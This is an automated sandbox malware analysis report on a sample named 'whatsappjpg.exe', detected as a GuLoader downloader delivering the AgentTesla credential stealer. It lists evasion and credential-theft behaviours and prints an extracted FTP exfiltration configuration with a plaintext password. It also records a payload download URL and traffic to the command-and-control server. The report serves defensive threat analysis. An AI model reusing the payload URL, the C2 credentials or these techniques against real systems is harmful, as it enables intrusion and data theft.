Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
whatsappjpg.exe

Overview

General Information

Sample name:whatsappjpg.exe
Analysis ID:1545931
MD5:8a3f9583866e402739f7da1541d6038d
SHA1:928530c1cee879a0c6c284f71a56039004ca4fa9
SHA256:fb89c14504a9c08ddc006305975b11a20f0595e1f2ad7bd9475ba5c245eda0f6
Tags:exeuser-lowmal3
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Check if machine is in data center or colocation facility
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • whatsappjpg.exe (PID: 7484 cmdline: "C:\Users\user\Desktop\whatsappjpg.exe" MD5: 8A3F9583866E402739F7DA1541D6038D)
    • whatsappjpg.exe (PID: 1284 cmdline: "C:\Users\user\Desktop\whatsappjpg.exe" MD5: 8A3F9583866E402739F7DA1541D6038D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "FTP", "Host": "ftp://mail.hearing-vision.com", "Username": "code@hearing-vision.com", "Password": "LILKOOLL14!"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000002.3844735931.00000000364AF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.3844735931.0000000036483000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000008.00000002.3844735931.0000000036483000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.2581366232.0000000005FA6000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: whatsappjpg.exe PID: 1284JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 1 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T10:36:26.833874+010020299271A Network Trojan was detected192.168.2.949976203.161.184.3421TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T10:36:27.737298+010028555421A Network Trojan was detected192.168.2.949977203.161.184.3450430TCP
              2024-10-31T10:36:27.742987+010028555421A Network Trojan was detected192.168.2.949977203.161.184.3450430TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T10:36:19.109989+010028032702Potentially Bad Traffic192.168.2.94997445.43.14.13480TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: whatsappjpg.exe.1284.8.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://mail.hearing-vision.com", "Username": "code@hearing-vision.com", "Password": "LILKOOLL14!"}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: whatsappjpg.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_0040276E FindFirstFileW,8_2_0040276E
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_00405770
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_0040622B FindFirstFileW,FindClose,8_2_0040622B

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49977 -> 203.161.184.34:50430
              Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49976 -> 203.161.184.34:21
              Source: global trafficTCP traffic: 192.168.2.9:49977 -> 203.161.184.34:50430
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
              Source: Joe Sandbox ViewASN Name: JOGJACAMP-AS-IDPTJCIndonesiaID JOGJACAMP-AS-IDPTJCIndonesiaID
              Source: unknownDNS query: name: ip-api.com
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49974 -> 45.43.14.134:80
              Source: unknownFTP traffic detected: 203.161.184.34:21 -> 192.168.2.9:49976 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:36. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:36. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
              Source: global trafficHTTP traffic detected: GET /disha/mDdzfEwyp125.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: hublore.inCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /disha/mDdzfEwyp125.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: hublore.inCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: hublore.in
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: mail.hearing-vision.com
              Source: whatsappjpg.exe, 00000008.00000002.3824732446.0000000007A30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hublore.in/disha/mDdzfEwyp125.bin
              Source: whatsappjpg.exe, 00000008.00000002.3824080245.0000000005D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hublore.in/disha/mDdzfEwyp125.binh(
              Source: whatsappjpg.exe, 00000008.00000002.3824080245.0000000005D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hublore.in/disha/mDdzfEwyp125.binp(
              Source: whatsappjpg.exe, 00000008.00000002.3844735931.0000000036451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
              Source: whatsappjpg.exe, 00000008.00000002.3844735931.0000000036451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: whatsappjpg.exe, 00000008.00000002.3844735931.00000000364AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.hearing-vision.com
              Source: whatsappjpg.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: whatsappjpg.exe, 00000008.00000002.3844735931.0000000036451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: whatsappjpg.exe, 00000000.00000002.2580955367.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, 660.jpg.0.dr, nsc8B5F.tmp.0.drString found in binary or memory: https://www.wikihow.com/Image:Type-Step-1-Version-6.jpg
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D1
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403358
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,8_2_00403358
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 0_2_00404B0E0_2_00404B0E
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 0_2_0040653D0_2_0040653D
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_00404B0E8_2_00404B0E
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_0040653D8_2_0040653D
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_00164A888_2_00164A88
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_00163E708_2_00163E70
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_001641B88_2_001641B8
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_394AC8808_2_394AC880
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_394A8D288_2_394A8D28
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_394A10D88_2_394A10D8
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_394AB8488_2_394AB848
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_394AB8398_2_394AB839
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_394AA0148_2_394AA014
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_394D65F88_2_394D65F8
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_394D00408_2_394D0040
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_394D87308_2_394D8730
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_394DE7D08_2_394DE7D0
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_394D9B908_2_394D9B90
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_394D32B88_2_394D32B8
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_394DAC488_2_394DAC48
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_394D8E7B8_2_394D8E7B
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_394D35988_2_394D3598
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 8_2_394D00128_2_394D0012
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: String function: 00402B38 appears 47 times
              Source: whatsappjpg.exe, 00000000.00000000.1345391351.0000000000454000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamekinglet.exe> vs whatsappjpg.exe
              Source: whatsappjpg.exe, 00000008.00000000.2575394897.0000000000454000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamekinglet.exe> vs whatsappjpg.exe
              Source: whatsappjpg.exe, 00000008.00000002.3824080245.0000000005D84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs whatsappjpg.exe
              Source: whatsappjpg.exe, 00000008.00000002.3844298833.00000000361F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs whatsappjpg.exe
              Source: whatsappjpg.exeBinary or memory string: OriginalFilenamekinglet.exe> vs whatsappjpg.exe
              Source: whatsappjpg.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/9@3/3
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 0_2_004045C8 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045C8
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_0040206A
              Source: C:\Users\user\Desktop\whatsappjpg.exeFile created: C:\Users\user\UploadableJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeMutant created: NULL
              Source: C:\Users\user\Desktop\whatsappjpg.exeFile created: C:\Users\user\AppData\Local\Temp\nsc8B5E.tmpJump to behavior
              Source: whatsappjpg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\whatsappjpg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\whatsappjpg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\whatsappjpg.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeFile read: C:\Users\user\Desktop\whatsappjpg.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\whatsappjpg.exe "C:\Users\user\Desktop\whatsappjpg.exe"
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess created: C:\Users\user\Desktop\whatsappjpg.exe "C:\Users\user\Desktop\whatsappjpg.exe"
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess created: C:\Users\user\Desktop\whatsappjpg.exe "C:\Users\user\Desktop\whatsappjpg.exe"Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeFile written: C:\Users\user\AppData\Local\Temp\Settings.iniJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000000.00000002.2581366232.0000000005FA6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
              Source: C:\Users\user\Desktop\whatsappjpg.exeCode function: 0_2_10002DB0 push eax; ret 0_2_10002DDE
              Source: C:\Users\user\Desktop\whatsappjpg.exeFile created: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\whatsappjpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
